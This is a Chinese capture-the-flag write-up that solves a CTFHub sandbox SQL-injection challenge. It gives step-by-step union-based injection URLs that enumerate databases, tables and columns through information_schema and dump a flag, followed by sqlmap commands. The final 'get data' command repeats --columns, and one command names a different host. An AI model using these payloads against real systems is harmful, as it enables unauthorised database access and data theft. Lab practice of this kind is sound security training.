一、手动注入

思路：注入点->库->表->列->数据

首先使用order by探测有几列

http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=1 order by 2

我们发现order by 2 的时候有回显，到了order by 3 的时候就没有回显了，所以列数为2

然后使用联合注入

http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select database(),user()

得到用户名与数据库名

拿到数据库列表

http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata

查当前数据库里的表名

http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

获取列名

http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x666c6167

获取数据

http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(flag) from flag

 

二、自动化工具

sqlmap下载GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool

python sqlmap.py -u http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=1 --tables

 

查找表中数据

python sqlmap.py -u http://challenge-aea2d226b5b3a939.sandbox.ctfhub.com:10800/?id=1 -T flag --columns

 获取表中数据

python sqlmap.py -u http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 -T flag --columns

拿到flag